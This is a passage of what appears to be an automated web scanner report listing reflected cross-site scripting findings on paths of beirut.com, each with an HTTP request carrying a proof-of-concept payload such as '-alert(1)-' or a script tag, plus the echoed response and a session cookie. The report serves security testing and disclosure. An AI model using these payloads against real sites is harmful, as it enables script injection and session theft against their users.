The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44d05'-alert(1)-'e5bf22974c0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Restaurants/Ice-Cream-and-Sweets44d05'-alert(1)-'e5bf22974c0/2144072380 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:06:19 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61110

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Restaurants/Ice-Cream-and-Sweets44d05'-alert(1)-'e5bf22974c0';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.715. http://www.beirut.com/Restaurants/Juice-Stalls/528624339 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Restaurants/Juice-Stalls/528624339

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abf1a"><a>aa61017ead2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Restaurantsabf1a"><a>aa61017ead2/Juice-Stalls/528624339 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:47:50 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60171

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Restaurantsabf1a"><a>aa61017ead2">
...[SNIP]...

4.716. http://www.beirut.com/Restaurants/Juice-Stalls/528624339 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Restaurants/Juice-Stalls/528624339

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c79f0'-alert(1)-'4eefd7ec071 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Restaurantsc79f0'-alert(1)-'4eefd7ec071/Juice-Stalls/528624339 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:00:45 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Restaurantsc79f0'-alert(1)-'4eefd7ec071/Juice-Stalls';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.717. http://www.beirut.com/Restaurants/Juice-Stalls/528624339 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Restaurants/Juice-Stalls/528624339

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19117'-alert(1)-'d1c1a51eafe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Restaurants/Juice-Stalls19117'-alert(1)-'d1c1a51eafe/528624339 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:04:04 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58527

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Restaurants/Juice-Stalls19117'-alert(1)-'d1c1a51eafe';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.718. http://www.beirut.com/Restaurants/Take-Away/646084613 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Restaurants/Take-Away/646084613

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 841f9"><a>21d75454e93 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Restaurants841f9"><a>21d75454e93/Take-Away/646084613 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:44:49 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60152

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Restaurants841f9"><a>21d75454e93">
...[SNIP]...

4.719. http://www.beirut.com/Restaurants/Take-Away/646084613 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Restaurants/Take-Away/646084613

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29b3d'-alert(1)-'6978ed6be48 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Restaurants29b3d'-alert(1)-'6978ed6be48/Take-Away/646084613 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:52:41 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Restaurants29b3d'-alert(1)-'6978ed6be48/Take-Away';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.720. http://www.beirut.com/Restaurants/Take-Away/646084613 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Restaurants/Take-Away/646084613

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 732c1'-alert(1)-'459e64ce0f5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Restaurants/Take-Away732c1'-alert(1)-'459e64ce0f5/646084613 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:58:05 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54822

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Restaurants/Take-Away732c1'-alert(1)-'459e64ce0f5';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.721. http://www.beirut.com/Restaurants/Winery/0312375197 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Restaurants/Winery/0312375197

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20a14'-alert(1)-'7bc71a9c1b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Restaurants20a14'-alert(1)-'7bc71a9c1b/Winery/0312375197 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:42:08 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60265

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Restaurants20a14'-alert(1)-'7bc71a9c1b/Winery';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.722. http://www.beirut.com/Restaurants/Winery/0312375197 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Restaurants/Winery/0312375197

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e9aa"><a>183d4f3f7ae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Restaurants7e9aa"><a>183d4f3f7ae/Winery/0312375197 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:36:22 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60454

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Restaurants7e9aa"><a>183d4f3f7ae">
...[SNIP]...

4.723. http://www.beirut.com/Restaurants/Winery/0312375197 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Restaurants/Winery/0312375197

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6d85'-alert(1)-'e0df76b5580 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Restaurants/Winerye6d85'-alert(1)-'e0df76b5580/0312375197 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:47:21 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Restaurants/Winerye6d85'-alert(1)-'e0df76b5580';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.724. http://www.beirut.com/Shopping/Books-Music-Movies/05084418 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Books-Music-Movies/05084418

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 30952'-alert(1)-'556232b32e7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping30952'-alert(1)-'556232b32e7/Books-Music-Movies/05084418 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:53:27 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping30952'-alert(1)-'556232b32e7/Books-Music-Movies';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.725. http://www.beirut.com/Shopping/Books-Music-Movies/05084418 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Books-Music-Movies/05084418

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9795b"><a>4e0ac1c97f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping9795b"><a>4e0ac1c97f/Books-Music-Movies/05084418 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:45:07 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59998

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping9795b"><a>4e0ac1c97f">
...[SNIP]...

4.726. http://www.beirut.com/Shopping/Books-Music-Movies/05084418 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Books-Music-Movies/05084418

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96d27'-alert(1)-'0ab7e97c8fd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Books-Music-Movies96d27'-alert(1)-'0ab7e97c8fd/05084418 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:58:10 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60608

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Books-Music-Movies96d27'-alert(1)-'0ab7e97c8fd';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.727. http://www.beirut.com/Shopping/Books-Music-Movies/05084418 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Books-Music-Movies/05084418

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4e072<script>alert(1)</script>4f7f6dbcf6c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Books-Music-Movies4e072<script>alert(1)</script>4f7f6dbcf6c/05084418 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
